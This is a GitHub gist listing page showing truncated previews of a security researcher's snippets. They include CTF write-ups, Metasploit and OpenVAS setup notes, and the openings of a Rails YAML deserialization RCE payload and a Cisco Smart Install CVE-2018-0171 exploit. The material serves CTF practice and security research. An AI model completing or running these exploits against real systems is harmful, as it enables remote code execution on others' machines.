LongCat pich4ya
pich4ya
/ Monster.py
Last active
February 11, 2018 16:14
https://evlzctf.in/challenges#Monster EvlzCTF 2018 - web 200 writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib,urllib2,cookielib | |
| import requests | |
| import re | |
| import json,string | |
| # Chosen plaintext attack on AES by Bongtrop Inw Za 007 | |
| def register(uname): | |
| s=requests.Session() | |
| res1=s.get('http://35.200.197.38:8014/register') | |
| m=re.search(r'name="csrf_token" type="hidden" value="(.+?)">',res1.content) |
pich4ya
/ Install Metasploit Framework v5.0.0 on MacOS 10.3.3 (2018).txt
Created
March 3, 2018 05:16
Install Metasploit Framework v5.0.0 on MacOS 10.3.3 (2018)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ git clone https://github.com/rapid7/metasploit-framework.git | |
| $ cd metasploit-framework | |
| $ ./msfconsole | |
| [*] Metasploit requires the Bundler gem to be installed | |
| $ gem install bundler | |
| ERROR: While executing gem ... (Gem::Exception) | |
| Unable to require openssl, install OpenSSL and rebuild ruby (preferred) or use non-HTTPS sources | |
| $ brew install openssl | |
| $ /usr/local/opt/[email protected]/bin/openssl version | |
| OpenSSL 1.1.0g 2 Nov 2017 |
pich4ya
/ railspwn.rb
Last active
November 29, 2018 06:25
— forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload, full credit to: https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee | |
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end |
pich4ya
/ gist:456620860729c2c8aea68c30edece759
Created
March 9, 2018 05:06
How to fix MacOS pip issue 'Command "python setup.py egg_info" failed with error code 1 '
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ pip2.7 install configparser | |
| Collecting configparser | |
| Using cached configparser-3.5.0.tar.gz | |
| ... | |
| ---------------------------------------- | |
| Command "python setup.py egg_info" failed with error code 1 in /private/var/folders/50/7j5rhs4n4tq9hw9mjm2yntg40000gn/T/pip-build-td9Vn6/configparser/ | |
| $ pip install --upgrade setuptools | |
| Collecting setuptools | |
| Using cached setuptools-38.5.2-py2.py3-none-any.whl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # pip3 install websocket-client | |
| import urllib | |
| from urllib.request import urlopen, Request | |
| from urllib.parse import urlencode | |
| import string | |
| import json | |
| import websocket | |
| import _thread |
pich4ya
/ gist:c8ea4b8b76616fa89f7968e2e9ac1b04
Created
March 18, 2018 13:53
Update Windows XP in 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Download WSUS Offline Update Version 9.2.3 | |
| http://download.wsusoffline.net/wsusoffline923.zip | |
| The version number is very important here. The latest version 11.1.1 does not support Windows XP. | |
| 2. Run UpdateGenerator.exe and then select the options suite to your WinXP edition. |
pich4ya
/ VolgaCTF Quals 2018 - Lazy Admin Writeup.txt
Last active
March 25, 2018 17:00
VolgaCTF Quals 2018 - Lazy Admin Writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| Lazy Admin | |
| This lazy admin has not authorized my account yet! Get his email, I want to write to him. | |
| https://quals.2018.volgactf.ru/tasks | |
| http://lazy-admin.quals.2018.volgactf.ru/ | |
| http://lazy-admin.quals.2018.volgactf.ru/robots.txt | |
| Disallow: /unauthorized_users.txt |
pich4ya
/ VolgaCTF Quals 2018 - Old Goverment Site Writeup.txt
Created
March 25, 2018 15:17
VolgaCTF Quals 2018 - Old Goverment Site Writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Old Goverment Site | |
| It's an old government web-site. Please, don't touch it. It works properly. | |
| http://old-government-site.quals.2018.volgactf.ru:8080/ | |
| http://old-government-site.quals.2018.volgactf.ru:8080/page?id=2 | |
| http://old-government-site.quals.2018.volgactf.ru:8080/page?id=18 | |
| Form with 2 fields > Site, Company description. |
pich4ya
/ openvas-check-setup.sh
Created
March 28, 2018 14:42
Copied from https://wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| ############################################################################### | |
| # OpenVAS | |
| # $Id$ | |
| # | |
| # Script for checking completeness and readiness of OpenVAS. | |
| # | |
| # Authors: | |
| # Jan-Oliver Wagner <[email protected]> |
pich4ya
/ smi_ibc_init_discovery_BoF.py
Created
April 1, 2018 16:21
Cisco Smart Install Client - Pre-Auth RCE (CVE-2018-0171) from https://embedi.com/blog/cisco-smart-install-remote-code-execution/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # smi_ibc_init_discovery_BoF.py | |
| import socket | |
| import struct | |
| from optparse import OptionParser | |
| # Parse the target options | |
| parser = OptionParser() | |
| parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args() |